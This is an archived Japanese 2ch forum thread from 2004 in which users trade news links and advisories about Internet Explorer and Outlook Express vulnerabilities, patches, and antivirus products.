http://www.itmedia.co.jp/enterprise/0402/18/epn03.html
671 :名無しさん@お腹いっぱい。:04/02/20 20:01
IEにパッチ未公開のセキュリティ・ホール,攻撃コードも出現している
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040220/140200/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040220/140200/
672 :名無しさん@お腹いっぱい。:04/03/01 16:45
IEのフレーム悪用でパスワード漏れ――iDEFENSEが警告
http://www.itmedia.co.jp/enterprise/0403/01/epic01.html
http://www.itmedia.co.jp/enterprise/0403/01/epic01.html
673 :名無しさん@お腹いっぱい。:04/03/04 22:01
Windows XP Service Pack 2ベータ版プレビュー(パート2)後編
「Security Center」,IE,OEのセキュリティ機能
http://itpro.nikkeibp.co.jp/members/NT/WinNext/20040302/2/
「Security Center」,IE,OEのセキュリティ機能
http://itpro.nikkeibp.co.jp/members/NT/WinNext/20040302/2/
674 :名無しさん@お腹いっぱい。:04/03/04 22:06
>673
>Outlook ExpressはHTMLメールから身を守れる
> MicrosoftはOutlook 2003において,HTML形式の電子メール内にある画像
>をブロックし,危険な可能性のある電子メールの添付物(例えば.exeという拡張
>子のファイル)を隔離するという,非常にニーズの高い安全対策を導入した。
>同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。
>Outlook ExpressはHTMLメールから身を守れる
> MicrosoftはOutlook 2003において,HTML形式の電子メール内にある画像
>をブロックし,危険な可能性のある電子メールの添付物(例えば.exeという拡張
>子のファイル)を隔離するという,非常にニーズの高い安全対策を導入した。
>同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。
675 :名無しさん@お腹いっぱい。:04/03/04 22:10
>>673
>ブラウザのアドオン管理はよくできている
> XP SP2のIEに追加される機能として,「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー,そのほかのご自
>分のシステムにインストールしたIEのアドオンを,リストの形で表示
>させたり,管理したりするのを手助けする。Add-on Managementツー
>ルは,私が知っているところでは,2つの基本機能を備えている。…
>IEの設定はスクリプトによる変更が不可に
> さて,IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では,IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。
>ブラウザのアドオン管理はよくできている
> XP SP2のIEに追加される機能として,「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー,そのほかのご自
>分のシステムにインストールしたIEのアドオンを,リストの形で表示
>させたり,管理したりするのを手助けする。Add-on Managementツー
>ルは,私が知っているところでは,2つの基本機能を備えている。…
>IEの設定はスクリプトによる変更が不可に
> さて,IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では,IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。
676 :名無しさん@お腹いっぱい。:04/03/12 17:10
677 :名無しさん@お腹いっぱい。:04/04/03 16:48
URL偽装問題再び――IEとOutlookに
Internet ExplorerとOutlook Expressに、URL偽装が可能な新たな問題が存在することが判明した。
http://www.itmedia.co.jp/enterprise/0404/02/epn07.html
Internet ExplorerとOutlook Expressに、URL偽装が可能な新たな問題が存在することが判明した。
http://www.itmedia.co.jp/enterprise/0404/02/epn07.html
678 :名無しさん@お腹いっぱい。:04/04/03 19:28
>>677
その上で右クリすれば見破れる。
その上で右クリすれば見破れる。
679 :名無しさん@お腹いっぱい。:04/04/03 21:43
いちいち右クリしなきゃならんのか…
680 :名無しさん@お腹いっぱい。:04/04/04 13:16
HTMLメールをテキストで表示するようにしてれば大丈夫なのではないかと…
681 :名無しさん@お腹いっぱい。:04/04/06 18:18
リンク先のURLを偽装できるセキュリティ・ホールがIEに,OEユーザーは特に注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040405/142470/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040405/142470/
682 :名無しさん@お腹いっぱい。:04/04/06 19:24
Internet Explorer showHelp() Restriction Bypass Vulnerability (secunia.com, 2004-03-29)
http://secunia.com/advisories/10523/
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/#20040406_showHelp
http://secunia.com/advisories/10523/
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/#20040406_showHelp
683 :名無しさん@お腹いっぱい。:04/04/06 19:39
684 :名無しさん@お腹いっぱい。:04/04/06 20:55
Outlook 2003はOEとちがってプレビューしても安全でしょうか?
685 :名無しさん@お腹いっぱい。:04/04/06 20:56
686 :名無しさん@お腹いっぱい。:04/04/07 14:13
>>682
ノートンは"MHTMLRedir.Exploit"として検出するようだ。
ノートンは"MHTMLRedir.Exploit"として検出するようだ。
687 :名無しさん@お腹いっぱい。:04/04/07 14:16
688 :687:04/04/07 21:13
MS03-032が当たってれば問題ないのか
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/04.html#20040407_tuiki
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/04.html#20040407_tuiki
689 :名無しさん@お腹いっぱい。:04/04/08 11:25
>>686
参考
MHTMLRedir.Exploit 発見日: 2003年12月11日 (米国時間)
http://www.symantec.com/region/jp/sarcj/data/m/mhtmlredir.exploit.html
>MHTMLRedir.Exploitは、悪意のあるWebサイトがユーザのコンピュータにプログラムをダウンロードし、
>実行することができるようにします。
参考
MHTMLRedir.Exploit 発見日: 2003年12月11日 (米国時間)
http://www.symantec.com/region/jp/sarcj/data/m/mhtmlredir.exploit.html
>MHTMLRedir.Exploitは、悪意のあるWebサイトがユーザのコンピュータにプログラムをダウンロードし、
>実行することができるようにします。
690 :名無しさん@お腹いっぱい。:04/04/09 23:01
Vendor Status Note JVNTA04-099A
Microsoft Internet Explorer に含まれる ITS プロトコルハンドラの脆弱性
http://jvn.doi.ics.keio.ac.jp/vn/JVNTA04-099A.html
W32/Bugbear-E
>ZIP 拡張子のある添付ファイルは、ベース64でエンコーディングされたワーム
>を持つ圧縮 HTMLを含み、HTML ファイルが開けられた時にワームが解読されて
>自動的に実行されるよう、 Microsoft Internet Explorer に関連するコードの
>脆弱性を利用しようとします。
http://www.sophos.co.jp/virusinfo/analyses/w32bugbeare.html
Microsoft Internet Explorer に含まれる ITS プロトコルハンドラの脆弱性
http://jvn.doi.ics.keio.ac.jp/vn/JVNTA04-099A.html
W32/Bugbear-E
>ZIP 拡張子のある添付ファイルは、ベース64でエンコーディングされたワーム
>を持つ圧縮 HTMLを含み、HTML ファイルが開けられた時にワームが解読されて
>自動的に実行されるよう、 Microsoft Internet Explorer に関連するコードの
>脆弱性を利用しようとします。
http://www.sophos.co.jp/virusinfo/analyses/w32bugbeare.html
691 :名無しさん@お腹いっぱい。:04/04/09 23:07
IEのパッチ未公開セキュリティ・ホールをUS-CERTなどが警告,複数の攻撃コードが出回っている
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040409/142701/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040409/142701/
692 :名無しさん@お腹いっぱい。:04/04/10 20:29
IE脆弱性を狙ったウイルスが登場、MSは「対策を進めている」
http://www.itmedia.co.jp/enterprise/0404/10/epn01.html
IEに脆弱性、完全な解決策は存在せず
http://www.itmedia.co.jp/enterprise/0404/10/epc02.html
http://www.itmedia.co.jp/enterprise/0404/10/epn01.html
IEに脆弱性、完全な解決策は存在せず
http://www.itmedia.co.jp/enterprise/0404/10/epc02.html
693 :名無しさん@お腹いっぱい。:04/04/10 21:13
これはヤバいかも・・・
694 :名無しさん@お腹いっぱい。:04/04/14 11:06
===緊急===
MS04-013 - Outlook Express 用の累積的な修正プログラム (837009)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-013.asp
Outlook Expressに「緊急」のセキュリティ・ホール,すぐにパッチの適用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040414/142886/
MS04-013 - Outlook Express 用の累積的な修正プログラム (837009)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-013.asp
Outlook Expressに「緊急」のセキュリティ・ホール,すぐにパッチの適用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040414/142886/
695 :名無しさん@お腹いっぱい。:04/04/14 11:11
696 :名無しさん@お腹いっぱい。:04/04/14 11:19
697 :名無しさん@お腹いっぱい。:04/04/14 11:46
2年前の投稿にレスつけられてもな・・・
698 :名無しさん@お腹いっぱい。:04/04/14 12:03
699 :名無しさん@お腹いっぱい。:04/04/14 12:14
パッチをあてる と
アップグレードは意味ちがうのですか?
アップグレードは意味ちがうのですか?
700 :名無しさん@お腹いっぱい。:04/04/14 12:53
厳密にはな、まあ前後の文意から読め
つーか何の話だ
つーか何の話だ
701 :名無しさん@お腹いっぱい。:04/04/14 12:55
>>699
パッチをあてるは文字通りその穴に対する「つぎあて」。グレードはあがらないのが普通。
パッチをあてるは文字通りその穴に対する「つぎあて」。グレードはあがらないのが普通。
702 :名無しさん@お腹いっぱい。:04/04/14 14:02
パッチ未公開のセキュリティ・ホールにも対応,最新版「IEを使い続けるための“お勧め”設定」
今までの“お勧め”設定では不十分,「マイ コンピュータ」ゾーンでもセキュリティ設定を
今週のSecurity Check [Windows編] (第116回,2004年4月14日
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040413/2/
今までの“お勧め”設定では不十分,「マイ コンピュータ」ゾーンでもセキュリティ設定を
今週のSecurity Check [Windows編] (第116回,2004年4月14日
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040413/2/
703 :名無しさん@お腹いっぱい。:04/04/20 14:05
ID詐取「フィッシング」を防止するIE向けツールバー,米EarthLinkが発表
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20040420/143274/
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20040420/143274/
704 :名無しさん@お腹いっぱい。:04/04/21 09:41
サイトー企画社の鶴亀メール バージョン 3.50 for Windows に
Buffer Overflow の問題を発見しました。悪意のある攻撃者は、
この問題を利用し 鶴亀メールを実行するユーザの権限で任意
のコードを実行できる可能性があります。
http://www.lac.co.jp/security/csl/intelligence/SNSadvisory/71.html
Buffer Overflow の問題を発見しました。悪意のある攻撃者は、
この問題を利用し 鶴亀メールを実行するユーザの権限で任意
のコードを実行できる可能性があります。
http://www.lac.co.jp/security/csl/intelligence/SNSadvisory/71.html
705 :名無しさん@お腹いっぱい。:04/04/21 10:50
「危険なセキュリティ・ホールが複数,深刻度が『なし』から『緊急』に」
――4月のセキュリティ情報を解説する
“超特大”のセキュリティ・ホールが含まれる,相次ぐセキュリティ情報の変更に注意
今週のSecurity Check [Windows編] (第117回,2004年4月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040420/1/
――4月のセキュリティ情報を解説する
“超特大”のセキュリティ・ホールが含まれる,相次ぐセキュリティ情報の変更に注意
今週のSecurity Check [Windows編] (第117回,2004年4月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040420/1/
706 :名無しさん@お腹いっぱい。:04/04/21 22:49
セキュリティ・ホールを突くフィッシングが出現,キー・ロガーを仕掛ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040421/143365/
>今回のフィッシングが突くセキュリティ・ホールは,マイクロソフト
>が4月14日に公開したセキュリティ・ホールの一つ「MS04-013」であ
>る(関連記事)。このセキュリティ・ホールは「Outlook Expressに
>関するセキュリティ・ホール」とされているものの,正確には
>Outlook Expressに実装されている「MHTMLプロトコル・ハンドラ」の
>セキュリティ・ホールである。このため,Outlook Expressに限らず,
>Internet Explorer(IE)などで「mhtml」を含むURLにアクセスする
>場合には,このセキュリティ・ホールの影響を受ける。同社のセキュ
>リティ情報で「Outlook Expressを使っていなくても,Outlook Express
>がインストールされている環境ではパッチを適用する必要がある」と
>しているのはこのためである。つまり,「MS04-013」のパッチを適用
>していない環境において,偽のメール(フィッシング・メール)に記
>載されたリンクにIEでアクセスすると,キー・ロガーを勝手にインス
>トールされることになる。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040421/143365/
>今回のフィッシングが突くセキュリティ・ホールは,マイクロソフト
>が4月14日に公開したセキュリティ・ホールの一つ「MS04-013」であ
>る(関連記事)。このセキュリティ・ホールは「Outlook Expressに
>関するセキュリティ・ホール」とされているものの,正確には
>Outlook Expressに実装されている「MHTMLプロトコル・ハンドラ」の
>セキュリティ・ホールである。このため,Outlook Expressに限らず,
>Internet Explorer(IE)などで「mhtml」を含むURLにアクセスする
>場合には,このセキュリティ・ホールの影響を受ける。同社のセキュ
>リティ情報で「Outlook Expressを使っていなくても,Outlook Express
>がインストールされている環境ではパッチを適用する必要がある」と
>しているのはこのためである。つまり,「MS04-013」のパッチを適用
>していない環境において,偽のメール(フィッシング・メール)に記
>載されたリンクにIEでアクセスすると,キー・ロガーを勝手にインス
>トールされることになる。
707 :名無しさん@お腹いっぱい。:04/05/02 01:23
Norton Internet Security 2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
スクリプト遮断機能がある
広告ブロックがアメリカ仕様で、お絵かき掲示板などの画像も消してしまう
スレに貼り付けてあるだけのウイルスコードに反応する
2chの過去ログ取得する時はFWを無効にしないといけない
Antispamが勝手にメーラーと統合する上に不安定(OEと相性が悪い?)
ポップアップ通知が鬱陶しい
LiveUpdateが遅い
webごとにスプリクト遮断やActiveX遮断やプライバシー制御の設定ができる
WEB閲覧するときHTMLファイルにスクリプトを埋め込む処理が重い
(XPSP2ではデフォルトでポップアップ広告遮断機能があるので無駄になる)
回線速度が遅くなるという報告
ルールが適切ではないとの声もあるがPFWルールの自動作成が進んでいる
不正コピー・不正期限延長ユーザーが多い
個人情報を送ってるかについては疑惑は晴れず。
http://www.symantec.com/region/jp/products/nis/features.html
http://www.symantec.com/region/jp/products/nav/features.html
ウイルスバスター2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
FWレベル高にしないとアプリごとの制御ができない等、おまけ程度
スパイウェアの検出をするが削除は出来ない
迷惑メール検出の判定精度が悪い上に検出しても件名に[MEIWAKU]と付けるだけで意味がない
ユーザー登録しないとウィルス定義をUPできないので不正コピーユーザーは少ない
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/features.htm
FWがしょぼい代わりに不具合が少ないバスターとFWにいろいろと機能が付いてる
代わりに不具合大盛りなNISって感じかな。
どちらもアンチウイルス機能自体には文句が出ないのは例年通り。
http://pc3.2ch.net/test/read.cgi/sec/1067918099/321
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
スクリプト遮断機能がある
広告ブロックがアメリカ仕様で、お絵かき掲示板などの画像も消してしまう
スレに貼り付けてあるだけのウイルスコードに反応する
2chの過去ログ取得する時はFWを無効にしないといけない
Antispamが勝手にメーラーと統合する上に不安定(OEと相性が悪い?)
ポップアップ通知が鬱陶しい
LiveUpdateが遅い
webごとにスプリクト遮断やActiveX遮断やプライバシー制御の設定ができる
WEB閲覧するときHTMLファイルにスクリプトを埋め込む処理が重い
(XPSP2ではデフォルトでポップアップ広告遮断機能があるので無駄になる)
回線速度が遅くなるという報告
ルールが適切ではないとの声もあるがPFWルールの自動作成が進んでいる
不正コピー・不正期限延長ユーザーが多い
個人情報を送ってるかについては疑惑は晴れず。
http://www.symantec.com/region/jp/products/nis/features.html
http://www.symantec.com/region/jp/products/nav/features.html
ウイルスバスター2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
FWレベル高にしないとアプリごとの制御ができない等、おまけ程度
スパイウェアの検出をするが削除は出来ない
迷惑メール検出の判定精度が悪い上に検出しても件名に[MEIWAKU]と付けるだけで意味がない
ユーザー登録しないとウィルス定義をUPできないので不正コピーユーザーは少ない
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/features.htm
FWがしょぼい代わりに不具合が少ないバスターとFWにいろいろと機能が付いてる
代わりに不具合大盛りなNISって感じかな。
どちらもアンチウイルス機能自体には文句が出ないのは例年通り。
http://pc3.2ch.net/test/read.cgi/sec/1067918099/321
708 :名無しさん@お腹いっぱい。:04/05/08 22:22
Eudoraに深刻なセキュリティホール
http://www.itmedia.co.jp/enterprise/0405/08/epc05.html
http://www.itmedia.co.jp/enterprise/0405/08/epc05.html
709 :名無しさん@お腹いっぱい。:04/05/11 14:10
Outlook ExpressやEudoraなどに
ステータス・バーを偽装できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040511/143979/
>メール・ソフトOutlook Express/OutlookおよびEudoraに,
>リンクの飛び先を表示するステータス・バーを偽装できる
>セキュリティ・ホールがそれぞれ見つかっている。
ステータス・バーを偽装できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040511/143979/
>メール・ソフトOutlook Express/OutlookおよびEudoraに,
>リンクの飛び先を表示するステータス・バーを偽装できる
>セキュリティ・ホールがそれぞれ見つかっている。
710 :名無しさん@お腹いっぱい。:04/05/11 21:50
>>709
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/05.html#20040511_ph
Opera7.23jaでは、釣られなかった。
http://www.st.ryukoku.ac.jp/~kjm/test/deep-sea-phishing.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/05.html#20040511_ph
Opera7.23jaでは、釣られなかった。
http://www.st.ryukoku.ac.jp/~kjm/test/deep-sea-phishing.html
711 :名無しさん@お腹いっぱい。:04/05/12 22:31
IEやOEの脆弱性を悪用し、リンクをクリックするだけで感染するウイルス
〜件名が「Re:」で本文に「yahoo.com」のリンクがある場合は要注意
http://internet.watch.impress.co.jp/cda/news/2004/05/12/3068.html
〜件名が「Re:」で本文に「yahoo.com」のリンクがある場合は要注意
http://internet.watch.impress.co.jp/cda/news/2004/05/12/3068.html
712 :名無しさん@お腹いっぱい。:04/05/13 15:56
月例パッチの裏で取り残されたIE/Outlookの問題
http://www.itmedia.co.jp/enterprise/0405/12/epn08.html
マイクロソフトは5月12日、Windowsの月例パッチを公開したが、
一方でいまだ修正にいたらないIEおよびOutlook製品の複数の
セキュリティホールが報告されている。
http://www.itmedia.co.jp/enterprise/0405/12/epn08.html
マイクロソフトは5月12日、Windowsの月例パッチを公開したが、
一方でいまだ修正にいたらないIEおよびOutlook製品の複数の
セキュリティホールが報告されている。
713 :名無しさん@お腹いっぱい。:04/05/15 15:23
714 :名無しさん@お腹いっぱい。:04/05/20 12:57
Outlook 2003に危険度「中」の脆弱性
http://www.itmedia.co.jp/enterprise/0405/19/epc03.html
http://www.itmedia.co.jp/enterprise/0405/19/epc03.html
715 :名無しさん@お腹いっぱい。:04/05/20 16:38
>>714
乙
乙
716 :名無しさん@お腹いっぱい。:04/05/21 12:03
717 :名無しさん@お腹いっぱい。:04/06/02 21:40
Microsoft Internet Explorer ImageMap URL Spoof Vulnerability
http://www.kurczaba.com/securityadvisories/0405132.htm
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.05/msg00206.html
http://www.kurczaba.com/securityadvisories/0405132.htm
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.05/msg00206.html
718 :名無しさん@お腹いっぱい。:04/06/09 12:21
Internet Explorer Local Resource Access and Cross-Zone Scripting Vulnerabilities
http://secunia.com/advisories/11793/
http://secunia.com/advisories/11793/
719 :名無しさん@お腹いっぱい。:04/06/10 09:42
IEにパッチ未公開のセキュリティ・ホール,悪用するWebサイトが既に存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040609/145590/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040609/145590/
720 :名無しさん@お腹いっぱい。:04/06/10 09:51
IE6に任意のコードが実行可能な脆弱性、すでに悪用法が公開されている
〜6月の月例パッチでは、修正プログラムが提供されず
http://internet.watch.impress.co.jp/cda/news/2004/06/09/3420.html
〜6月の月例パッチでは、修正プログラムが提供されず
http://internet.watch.impress.co.jp/cda/news/2004/06/09/3420.html
721 :名無しさん@お腹いっぱい。:04/06/11 15:48
JustSystem Shurikenマンセー
独自ブラウザエンジンマンセー
独自ブラウザエンジンマンセー
722 :名無しさん@お腹いっぱい。:04/06/12 10:23
723 :名無しさん@お腹いっぱい。:04/06/12 23:42
724 :名無しさん@お腹いっぱい。:04/06/15 12:58
IEやMozillaにアドレス・バーを偽装されるセキュリティ・ホール
IEではセキュリティ設定を回避される恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040614/145800/
IEではセキュリティ設定を回避される恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040614/145800/
725 :名無しさん@お腹いっぱい。:04/06/23 00:14
【新型ブラクラ】IE及び2chブラウザも注意!
http://qb5.2ch.net/test/read.cgi/operate/1087907963/l50
またもやOperaにアドレス・バーを偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040622/146233/
http://qb5.2ch.net/test/read.cgi/operate/1087907963/l50
またもやOperaにアドレス・バーを偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040622/146233/
726 :名無しさん@お腹いっぱい。:04/06/24 10:51
IEの印刷機能にバグ,特定ページを印刷すると大量の印刷物が出力される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040623/146295/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040623/146295/
727 :名無しさん@お腹いっぱい。:04/06/25 00:39
>>726
大量とは500枚以上らしい
IEでページを印刷する際、意図せずに500枚以上印刷してしまう不具合
http://internet.watch.impress.co.jp/cda/news/2004/06/24/3627.html
大量とは500枚以上らしい
IEでページを印刷する際、意図せずに500枚以上印刷してしまう不具合
http://internet.watch.impress.co.jp/cda/news/2004/06/24/3627.html
728 :名無しさん@お腹いっぱい。:04/06/25 21:08
ウェブサイトにアクセスしただけで感染――IEユーザーに警告
http://www.itmedia.co.jp/enterprise/articles/0406/25/news051.html
http://www.itmedia.co.jp/enterprise/articles/0406/25/news051.html
729 :名無しさん@お腹いっぱい。:04/06/26 21:50
730 :名無しさん@お腹いっぱい。:04/06/26 22:39
731 :名無しさん@お腹いっぱい。:04/06/27 19:58
ワロタ
732 :名無しさん@お腹いっぱい。:04/06/30 14:31
IIS/IEを攻撃するDownload.Jectに関与したロシアのWebサイトが閉鎖に
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20040629/4/
IEのライバルにチャンス到来――脚光浴びるブラウザセキュリティ
http://www.itmedia.co.jp/enterprise/articles/0406/29/news030.html
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20040629/4/
IEのライバルにチャンス到来――脚光浴びるブラウザセキュリティ
http://www.itmedia.co.jp/enterprise/articles/0406/29/news030.html
733 :名無しさん@お腹いっぱい。:04/07/01 13:08
IEにセキュリティ・ホール,フレーム中に任意のコンテンツを表示させられる
有名企業のWebページに偽ページを埋め込むことが可能に
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040630/146625/
有名企業のWebページに偽ページを埋め込むことが可能に
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040630/146625/
734 :名無しさん@お腹いっぱい。:04/07/01 15:18
>>733
((;゚Д゚)ガクガクブルブル
((;゚Д゚)ガクガクブルブル
735 :名無しさん@お腹いっぱい。:04/07/02 00:32
おかげさまでIE(含OE)は何でもありのブラウザまで進化しました。
この状況を希望しない方はFirefox若しくはOperaをご使用下さい。
この状況を希望しない方はFirefox若しくはOperaをご使用下さい。
736 :名無しさん@お腹いっぱい。:04/07/02 08:17
( ゚Д゚)<ポカーン
737 :名無しさん@お腹いっぱい。:04/07/02 12:45
フレーム詐称の問題はIE以外のWebブラウザにも
http://www.itmedia.co.jp/enterprise/articles/0407/02/news015.html
Windows版のIE5.01/5.5/6に、フレームを悪用してWebサイトの偽装が可能な問題
が指摘されたが、Opera、Mozillaなど他のWebブラウザにも同様の問題が存在するこ
とが明らかになった。
http://www.itmedia.co.jp/enterprise/articles/0407/02/news015.html
Windows版のIE5.01/5.5/6に、フレームを悪用してWebサイトの偽装が可能な問題
が指摘されたが、Opera、Mozillaなど他のWebブラウザにも同様の問題が存在するこ
とが明らかになった。
738 :名無しさん@お腹いっぱい。:04/07/02 21:26
これってIE3/4で一度は修正された穴でしょ。
どいつもこいつも三歩歩いたら忘れる学習能力ゼロの鳥頭ですか?
どいつもこいつも三歩歩いたら忘れる学習能力ゼロの鳥頭ですか?
739 :名無しさん@お腹いっぱい。:04/07/03 23:34
Download.Ject に関する情報
http://www.microsoft.com/japan/security/incident/download_ject.mspx
公開日: 2004年06月25日 | 更新日: 2004年07月03日 2:00
http://www.microsoft.com/japan/security/incident/download_ject.mspx
公開日: 2004年06月25日 | 更新日: 2004年07月03日 2:00
740 :名無しさん@お腹いっぱい。:04/07/04 01:18
>>739
そこTechNetセキュリティにリンクがない_| ̄|○
これからは↓にしろってことか
http://www.microsoft.com/japan/security/default.mspx
と思ったらTechNetの一番上にはリンクあるのね
そこTechNetセキュリティにリンクがない_| ̄|○
これからは↓にしろってことか
http://www.microsoft.com/japan/security/default.mspx
と思ったらTechNetの一番上にはリンクあるのね
741 :名無しさん@お腹いっぱい。:04/07/06 19:21
IEの“攻撃回避プログラム”は万全ではない,回避できない攻撃手法が公開されている
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040705/146831/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040705/146831/
742 :名無しさん@お腹いっぱい。:04/07/08 23:19
IE の脆弱性、いまだ存在との指摘
http://japan.internet.com/webtech/20040708/12.html
http://japan.internet.com/webtech/20040708/12.html
743 :名無しさん@お腹いっぱい。:04/07/12 07:30
>>741と同じ内容ですね
744 :名無しさん@お腹いっぱい。:04/07/13 09:59
OutlookとWordの組み合わせにセキュリティ・ホール,メール転送で任意のコードを実行させられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040712/147134/
IEコンポーネントではないが、使用者多そうなので。。。-
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040712/147134/
IEコンポーネントではないが、使用者多そうなので。。。-
745 :名無しさん@お腹いっぱい。:04/07/13 10:19
もう良いよ。疲れたよ。
非IE系ブラウザに乗り換えます。
非IE系ブラウザに乗り換えます。
746 :名無しさん@お腹いっぱい。:04/07/13 22:21
IEに巨大なテキストファイルを表示するとクラッシュする脆弱性
http://internet.watch.impress.co.jp/cda/news/2004/07/13/3880.html
http://internet.watch.impress.co.jp/cda/news/2004/07/13/3880.html
747 :名無しさん@お腹いっぱい。:04/07/14 09:09
Outlook Express 用の累積的なセキュリティ更新プログラム (823353) (MS04-018)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-018.asp
Outlook Explorer 6って…
http://www.microsoft.com/japan/technet/security/bulletin/ms04-018.asp
Outlook Explorer 6って…
748 :名無しさん@お腹いっぱい。:04/07/14 11:59
「ポップアップ・ウインドウで画面表示を偽装できる」
――IEでファイルをダウンロードするときには注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040713/147187/
――IEでファイルをダウンロードするときには注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040713/147187/
749 :名無しさん@お腹いっぱい。:04/07/14 22:56
IEにパッチ未公開のセキュリティ・ホールが続出
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040714/147214/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040714/147214/
750 :名無しさん@お腹いっぱい。:04/07/15 11:15
》749
自動的にMozilla♪
自動的にMozilla♪
751 :名無しさん@お腹いっぱい。:04/07/16 00:09
》????????????
752 :名無しさん@お腹いっぱい。:04/07/29 09:40
OperaやMozillaのセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20040728/147862/
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20040728/147862/
753 :名無しさん@お腹いっぱい。:04/07/29 10:56
セキュリティ・ホール
人間が作っているんだもんそんなの当たり前。
きっと完璧なコンピューターでロジックのあら捜ししたら、今見つかっている
5倍は見つかると思うよ。
人間が作っているんだもんそんなの当たり前。
きっと完璧なコンピューターでロジックのあら捜ししたら、今見つかっている
5倍は見つかると思うよ。
754 :名無しさん@お腹いっぱい。:04/07/31 09:38
===緊急===
MS04-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (867801)
http://go.microsoft.com/?linkid=771783
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。
MS04-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (867801)
http://go.microsoft.com/?linkid=771783
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。
755 :名無しさん@お腹いっぱい。:04/08/03 14:55
「IEのセキュリティ・ホールは危険,公開されていない攻撃手法が存在する」――ラック
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040802/148057/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040802/148057/
756 :名無しさん@お腹いっぱい。:04/08/05 14:56
>>753
完璧なコンピューターって、なんじゃ?
完璧なコンピューターって、なんじゃ?
757 :名無しさん@お腹いっぱい。:04/08/17 17:39
またもやIEにアドレス・バーを偽装できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040817/148670/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040817/148670/
758 :名無しさん@お腹いっぱい。:04/08/18 11:55
もう何度目? IEのアドレスバー偽装問題、再び
http://www.itmedia.co.jp/enterprise/articles/0408/17/news061.html
http://www.itmedia.co.jp/enterprise/articles/0408/17/news061.html
759 :名無しさん@お腹いっぱい。:04/08/19 00:30
Operaだって1ヶ月に4回アドレスバー偽装が発見されたりしたじゃん
760 :名無しさん@お腹いっぱい。:04/08/19 00:49
テスト結果
Internet Explorer v6.00 SP1 (6.00.2800.1106)では再現されました
Mozilla/5.0 Gecko/20040803 Firefox/0.9.3では再現されず
Internet Explorer v6.00 SP1 (6.00.2800.1106)では再現されました
Mozilla/5.0 Gecko/20040803 Firefox/0.9.3では再現されず
